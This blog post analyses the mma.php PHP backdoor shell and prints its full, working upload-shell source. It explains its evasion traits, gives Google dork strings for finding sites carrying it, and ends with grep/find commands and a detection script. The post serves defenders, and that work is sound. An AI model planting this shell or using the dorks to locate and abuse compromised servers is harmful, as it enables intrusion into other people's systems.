2012. 4. 2. 18:38

Analysis on mma.php Backdoor Shell

All right guys, today let's have a look at a very common backdoor shell that allows an attacker to upload arbitrary files to the web server. The shell is called mma.php, and that is the name it is usually uploaded under on the websites I've been inspecting for possible backdoor uploads using the power of Google dorks.

My first encounter with this backdoor shell was like two years ago and I was still a seminarian during that time. I decided to write about it because it is still used by some defacers or attackers. Here is the script:

<?php
// Print the OS/kernel string so the attacker knows what the host runs.
echo '<b><br><br>'.php_uname().'<br></b>';
// Minimal multipart upload form posting back to this same file.
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    // The uploaded temp file is copied next to the shell, under the client-supplied name, with no checks at all.
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>uplod d0n3 in SAME file // Th3 MMA \\</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

And this is what it looks like:

It echoes the kernel version because of the php_uname() function. At least that gives us one PHP function we can search for to find this backdoor shell. So what makes this backdoor shell risky? Well, like I said, it allows the attacker to upload arbitrary files, which means he can host his scripts, upload more backdoor shells, and host other PHP files. Mma.php is one of the backdoor shells that doesn't use shell_exec, so that antivirus or rootkit hunters are less likely to flag it as a suspicious file.

If the file upload succeeds it echoes "uplod d0n3 in SAME file // Th3 MMA \", otherwise it echoes "Upload GAGAL !!!". So if Google caches the page, the attacker can also dork for these keywords to find this backdoor shell.

With most attackers using the name mma.php, other Google dorkers can search for the file with inurl:"mma.php", for example. In my recent research on this backdoor shell, most attackers upload it into the /image directory, and some web servers allow directory listing there, which makes the backdoor shell even easier for them to find.

To locate this backdoor shell, you just need to run these commands in your terminal:

grep -Rn "php_uname *(" /var/www

find / -name mma.php
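The two commands above check one indicator each. The script below, an added example that is not part of the original post, combines all the indicators the post mentions (the file name, the php_uname( call, the two result strings, and copy() applied straight to the uploaded temp file) into one scan, and reports which of them matched per file, so a lone php_uname( hit from a legitimate admin page can be told apart from a real mma.php. It assumes a POSIX sh with find and grep, and a web root such as /var/www passed as the first argument; the sample tree it builds is constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original post): scan a web root for the mma.php
# indicators described above. Assumed: POSIX sh with find/grep; the web root
# (e.g. /var/www) is passed as $1.

# Print "<path><TAB><matched indicators>" for every .php file under $1 that
# matches at least one indicator. php_uname( on its own is a weak signal
# (legitimate admin pages call it); the other strings are specific to mma.php.
scan_for_mma() {
    find "$1" -type f -name '*.php' | while read -r f; do
        hits=""
        case "$(basename "$f")" in mma.php) hits="${hits}name ";; esac
        grep -q  'php_uname *('                      "$f" && hits="${hits}php_uname "
        grep -qF "uplod d0n3"                        "$f" && hits="${hits}uplod_d0n3 "
        grep -qF "Upload GAGAL"                      "$f" && hits="${hits}gagal "
        grep -qF "copy(\$_FILES['file']['tmp_name']" "$f" && hits="${hits}raw_copy "
        if [ -n "$hits" ]; then printf '%s\t%s\n' "$f" "$hits"; fi
    done
    return 0
}

# Constructed sample tree for trying the scanner offline: one benign page, one
# legitimate page that happens to call php_uname(), and one file carrying the
# mma.php strings (it is not a working shell, only the indicator strings).
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/images"
    printf '<?php echo "hello"; ?>\n'                              > "$d/index.php"
    printf '<?php echo php_uname(); ?>\n'                          > "$d/sysinfo.php"
    printf '<?php echo php_uname(); echo "Upload GAGAL !!!"; ?>\n' > "$d/images/mma.php"
    echo "$d"
}

# Usage: sh scan_mma.sh /var/www   (with no argument, scan the constructed fixture)
if [ -n "$1" ]; then
    scan_for_mma "$1"
else
    root=$(make_fixture)
    scan_for_mma "$root"
    rm -rf "$root"
fi
```

Anything reported with name, uplod_d0n3, gagal or raw_copy deserves a look right away; a file that only matches php_uname should be reviewed but is often a legitimate status page.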

Be safe guys!

Source: theprojectxblog.net
